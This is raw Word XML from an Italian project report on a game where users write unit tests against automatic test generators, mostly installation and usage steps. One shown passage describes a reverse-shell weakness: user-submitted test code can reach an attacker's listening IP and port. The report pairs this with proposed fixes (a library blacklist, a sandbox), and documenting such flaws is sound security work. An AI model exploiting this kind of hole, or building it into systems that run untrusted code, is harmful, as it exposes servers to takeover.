        <w:t xml:space="preserve"> e){}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AFFD5B" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289736FF" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E150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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2673BC" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="0055772E"/>
    <w:p w14:paraId="4FB64DB9" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E1508">
      <w:r w:rsidRPr="00715086">
        <w:t>(Ciò presuppone di essere in ascolto tramite tcp sul proprio ip attackerip e sulla porta attackerport per ottenere la shell).</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Questa vulnerabilità può essere risolta principalmente in due modi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B59BE" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E1508">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>utilizzo di una blacklist di librerie, per non permettere all'utente di eseguire determinate azioni. Un approccio molto delicato, perché una singola dimenticanza lascia comunque il sistema completamente vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD37D9E" w14:textId="3C0CE072" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="002E1508">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>esecuzione dei test in una sandbox protetta, in modo tale che qualsiasi tentativo di attacco sia confinato in una zona sicura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF8880" w14:textId="77777777" w:rsidR="002E1508" w:rsidRPr="00715086" w:rsidRDefault="002E1508" w:rsidP="0055772E"/>
    <w:p w14:paraId="49B98D96" w14:textId="1966FB5B" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc148195759"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004D4BE6" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B87D3E" w:rsidRPr="00715086">
        <w:t>Installazione</w:t>
      </w:r>
      <w:r w:rsidR="004D4BE6" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> ed Esecuzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5A25EFCF" w14:textId="0DEF43C7" w:rsidR="004D4BE6" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="004D4BE6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc148195760"/>
      <w:r w:rsidRPr="00715086">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004D4BE6" w:rsidRPr="00715086">
        <w:t>.1 Installazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="7A7AE40C" w14:textId="46872595" w:rsidR="00DE7EF9" w:rsidRPr="00715086" w:rsidRDefault="00DE7EF9" w:rsidP="00DE7EF9">
      <w:r w:rsidRPr="00715086">
        <w:t>L’installazione dell’applicazione è semplice e intuitiva grazie all’utilizzo di Docker, in particolare abbiamo utilizzato un Docker-compose per l’inizializzazione di tutti i container. Tale file contiene per ogni container: il percorso del Dockerfile, il port mapping, la rete, e l’eventuale volume da collegare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB77725" w14:textId="6370250F" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00DE7EF9" w:rsidP="00E01ACE">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Per avviare l’applicazione basta </w:t>
      </w:r>
      <w:r w:rsidR="00E01ACE" w:rsidRPr="00715086">
        <w:t>seguire i seguenti passi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8191D" w14:textId="1C52BFF1" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00E01ACE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Avviare Docker Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037FD4E" w14:textId="330B637D" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00E01ACE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aprire il terminale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E259F97" w14:textId="77777777" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00E01ACE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Recarsi nella cartella contenente il progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BAD9E" w14:textId="5EDBBC56" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00E01ACE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Lanciare il seguente comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker compose up –build -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86E211" w14:textId="704C307F" w:rsidR="004D7C98" w:rsidRPr="00715086" w:rsidRDefault="004D7C98" w:rsidP="0077293B">
      <w:r w:rsidRPr="00715086">
        <w:t>L'opzione --build indica a Docker Compose di ricostruire le immagini dei servizi specificati nel file docker-compose.yml. Quando si esegue docker-compose up senza l'opzione --build, Docker Compose usa le immagini esistenti invece di ricompilarle.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>L'opzione -d viene utilizzata per eseguire i container in background. Senza questa opzione, i container vengono eseguiti in modalità foreground e il loro output viene visualizzato nella console corrente. Quando si utilizza -d, i container vengono avviati in background e il controllo viene restituito al prompt immediatamente, consentendo all'utente di continuare a lavorare nella stessa console senza essere bloccato dall'output dei container.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t xml:space="preserve">Quindi, se si esegue docker-compose up --build -d, si sta dicendo a Docker Compose di ricompilare le immagini (se necessario) e quindi avviare i container in background. </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55019B" w14:textId="0589689E" w:rsidR="0077293B" w:rsidRPr="00715086" w:rsidRDefault="0077293B" w:rsidP="0077293B">
      <w:r w:rsidRPr="00715086">
        <w:t>Nel caso in cui si volesse aggiungere una nuova classe da testare bisognerà svolgere i seguenti step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19E3FC" w14:textId="77777777" w:rsidR="0077293B" w:rsidRPr="00715086" w:rsidRDefault="0077293B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>l’admin deve inserire il file .java nel repository rispettando la struttura del Filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924A69D" w14:textId="74BDA4D7" w:rsidR="0077293B" w:rsidRPr="00715086" w:rsidRDefault="0077293B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Ri</w:t>
      </w:r>
      <w:r w:rsidR="004D7C98" w:rsidRPr="00715086">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">anciare il comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker compose up –build -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48295E6C" w14:textId="1ED80931" w:rsidR="004D7C98" w:rsidRPr="00715086" w:rsidRDefault="004D7C98">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>I test del robot Randoop saranno automaticamente generati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6048B4" w14:textId="77C25180" w:rsidR="0077293B" w:rsidRPr="00715086" w:rsidRDefault="004D7C98">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Per la generazione dei test EvoSuite, r</w:t>
      </w:r>
      <w:r w:rsidR="0077293B" w:rsidRPr="00715086">
        <w:t>ecarsi nel terminare del container evosuite-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A377694" w14:textId="17717C9A" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="005E6C0F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Recarsi nella cartella contenente il file .sh: </w:t>
      </w:r>
      <w:r w:rsidR="00035CA8" w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/app/robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F38775F" w14:textId="51991250" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="0077293B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Digitare il seguente comando</w:t>
      </w:r>
      <w:r w:rsidR="004D7C98" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> per la generazione dei test EvoSuite</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004D7C98" w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D7C98" w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>./robot_generazione.sh “NomeClasse” "NomePackage” “PercorsoPackage” “NumeroLivelli”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BDD8F" w14:textId="77777777" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00061638"/>
    <w:p w14:paraId="3D9C3E5F" w14:textId="7A1E2894" w:rsidR="00E01ACE" w:rsidRPr="00715086" w:rsidRDefault="00E01ACE" w:rsidP="00E01ACE">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">A questo punto è possibile recarsi tramite browser all’indirizzo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidR="004318BC" w:rsidRPr="00715086">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>per acceder all’editor di testo e utilizzare l’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79023CC1" w14:textId="77777777" w:rsidR="00983B21" w:rsidRPr="00715086" w:rsidRDefault="00983B21" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="669D5C35" w14:textId="77777777" w:rsidR="008F76F4" w:rsidRPr="00715086" w:rsidRDefault="008F76F4" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="4CB22BD8" w14:textId="77777777" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="095E8D85" w14:textId="77777777" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="731D7854" w14:textId="77777777" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="2ED22E61" w14:textId="77777777" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00E01ACE"/>
    <w:p w14:paraId="62E3AA3C" w14:textId="5C4E3BFF" w:rsidR="004D4BE6" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="004D4BE6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc148195761"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004D4BE6" w:rsidRPr="00715086">
        <w:t>.2 Prova di esecuzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="2EDB04F0" w14:textId="296245AB" w:rsidR="004D4BE6" w:rsidRPr="00715086" w:rsidRDefault="00983B21" w:rsidP="004D4BE6">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00826AD7" w:rsidRPr="00715086">
        <w:t>Una volta realizzata la procedura di installazione è possibile recarsi all’indirizzo localhost, sarà mostrata la seguente schermata contenente l’editor per la classe di test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC38CF" w14:textId="3DFDFE73" w:rsidR="00F923F6" w:rsidRPr="00715086" w:rsidRDefault="00F6674C" w:rsidP="004D4BE6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DEC9179" wp14:editId="284D06C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>348615</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6971030" cy="3703320"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1734481987" name="Immagine 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1987" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, Software multimediale&#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71030" cy="3703320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F923F6" w:rsidRPr="00715086">
        <w:t>NB: a titolo di esempio è stato commentato il test della funzione subtract</w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1E169" w14:textId="32BDFF75" w:rsidR="00826AD7" w:rsidRPr="00715086" w:rsidRDefault="00826AD7" w:rsidP="004D4BE6"/>
    <w:p w14:paraId="3E7FB377" w14:textId="65C1B291" w:rsidR="00826AD7" w:rsidRPr="00715086" w:rsidRDefault="00826AD7" w:rsidP="004D4BE6">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Nell’editor di testo è già presente un template in questo caso per la classe under test, quindi sarà possibile modificare la classe di test oppure passare direttamente alla compilazione. </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Cliccare quindi il bottone “</w:t>
      </w:r>
      <w:r w:rsidR="00030AF6" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>”, al termine della compilazione, esecuzione, e confronto del test con quello del robot, verrà mostrato un alert con i punteggi e il vincitore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA23E88" w14:textId="5F276F8C" w:rsidR="00826AD7" w:rsidRPr="00715086" w:rsidRDefault="00F923F6" w:rsidP="004D4BE6">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EF2814" wp14:editId="7CE36B1B">
            <wp:extent cx="6043184" cy="2606266"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1798324984" name="Immagine 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24984" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, Software multimedial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043184" cy="2606266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A938B" w14:textId="77777777" w:rsidR="00D022B2" w:rsidRPr="00715086" w:rsidRDefault="00D022B2" w:rsidP="004D4BE6"/>
    <w:p w14:paraId="5238962C" w14:textId="77777777" w:rsidR="00D022B2" w:rsidRPr="00715086" w:rsidRDefault="00D022B2" w:rsidP="004D4BE6"/>
    <w:p w14:paraId="6319E2D8" w14:textId="660B152F" w:rsidR="00826AD7" w:rsidRPr="00715086" w:rsidRDefault="00826AD7" w:rsidP="004D4BE6">
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>Infine è possibile consultare l’output della compilazione e visualizzare i risultati di coverage di utente e robot anche nella output window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F1D9C" w14:textId="26FA73E4" w:rsidR="00D022B2" w:rsidRPr="00715086" w:rsidRDefault="00F923F6" w:rsidP="00D022B2">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713CCA17" wp14:editId="60BC0581">
            <wp:extent cx="5875529" cy="2042337"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="457554858" name="Immagine 7" descr="Immagine che contiene testo, software, Software multimedial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54858" name="Immagine 7" descr="Immagine che contiene testo, software, Software multimediale, Icona del computer&#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875529" cy="2042337"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="131BDAF9" w14:textId="23D908C9" w:rsidR="00D022B2" w:rsidRPr="00715086" w:rsidRDefault="00D022B2" w:rsidP="00D022B2">
      <w:r w:rsidRPr="00715086">
        <w:t>Mentre nella finestra “Class Under Test” saranno evidenziate le righe di codice coperte (in verde) e quelle non coperte (in rosso):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D53603" w14:textId="4458E97B" w:rsidR="00D022B2" w:rsidRPr="00D022B2" w:rsidRDefault="00F923F6" w:rsidP="00D022B2">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2201F013" wp14:editId="7F5C361C">
            <wp:extent cx="5883150" cy="3848433"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="689064787" name="Immagine 8"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64787" name="Immagine 8" descr="Immagine che contiene testo, schermata, schermo, softwar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883150" cy="3848433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D022B2" w:rsidRPr="00D022B2" w:rsidSect="005E6C0F">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B6A9D" w14:textId="77777777" w:rsidR="004E4442" w:rsidRPr="00715086" w:rsidRDefault="004E4442" w:rsidP="00FD6F80">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61FE357D" w14:textId="77777777" w:rsidR="004E4442" w:rsidRPr="00715086" w:rsidRDefault="004E4442" w:rsidP="00FD6F80">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007150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D5B27" w14:textId="77777777" w:rsidR="004E4442" w:rsidRPr="00715086" w:rsidRDefault="004E4442" w:rsidP="00FD6F80">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="619240A0" w14:textId="77777777" w:rsidR="004E4442" w:rsidRPr="00715086" w:rsidRDefault="004E4442" w:rsidP="00FD6F80">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0071508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B96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05280A32"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C9B1CAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B85663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496269"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75524D74"/>
    <w:lvl w:ilvl="0" w:tplc="D7AC8922">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="502"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152D45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4C4A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966856"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05F0387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133F72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FCC9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4322AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBF4184E"/>
    <w:lvl w:ilvl="0" w:tplc="0410000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927" w:hanging="360"/>
      </w:p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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4185497B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D80557E"/>
    <w:lvl w:ilvl="0" w:tplc="0410000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927"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837C25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E800E314"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4F2B7AEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C10D1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24794F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1DA10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B1328E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB8EF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56940DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87E4C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6517D9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="272404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921526C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E642CAE"/>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6A0C2E59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAAE92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CD506E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB589486"/>
    <w:lvl w:ilvl="0" w:tplc="0410000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="785"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721A19D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857A97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A42E2156"/>
    <w:lvl w:ilvl="0" w:tplc="D7AC8922">
      <w:start w:val="3"/>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926064139">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1644382291">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1841003184">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="368410221">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2078554437">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1356887435">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1792623451">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="944922071">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="705757666">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="930428114">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="448008474">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1834369856">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1376662749">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="628365184">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1558542813">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="190075715">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="980227489">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1415935907">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="205901575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80"/>
    <w:rsid w:val="000034DC"/>
    <w:rsid w:val="00015B84"/>
    <w:rsid w:val="000215B2"/>
    <w:rsid w:val="00030AF6"/>
    <w:rsid w:val="000328F0"/>
    <w:rsid w:val="00033B61"/>
    <w:rsid w:val="00035CA8"/>
    <w:rsid w:val="00061638"/>
    <w:rsid w:val="00063615"/>
    <w:rsid w:val="00064E56"/>
    <w:rsid w:val="00070143"/>
    <w:rsid w:val="00073FE1"/>
    <w:rsid w:val="0008375E"/>
    <w:rsid w:val="00084B1B"/>
    <w:rsid w:val="000A02CF"/>
    <w:rsid w:val="000A2CD0"/>
    <w:rsid w:val="000A603E"/>
    <w:rsid w:val="000B2170"/>
    <w:rsid w:val="000C4967"/>
    <w:rsid w:val="000D3605"/>
    <w:rsid w:val="000D52F2"/>
    <w:rsid w:val="000E0072"/>
    <w:rsid w:val="000F0FB2"/>
    <w:rsid w:val="00105F55"/>
    <w:rsid w:val="00112F92"/>
    <w:rsid w:val="001164F0"/>
    <w:rsid w:val="00127893"/>
    <w:rsid w:val="00130783"/>
    <w:rsid w:val="00132B01"/>
    <w:rsid w:val="0015357C"/>
    <w:rsid w:val="001578E4"/>
    <w:rsid w:val="00163A33"/>
    <w:rsid w:val="00167D23"/>
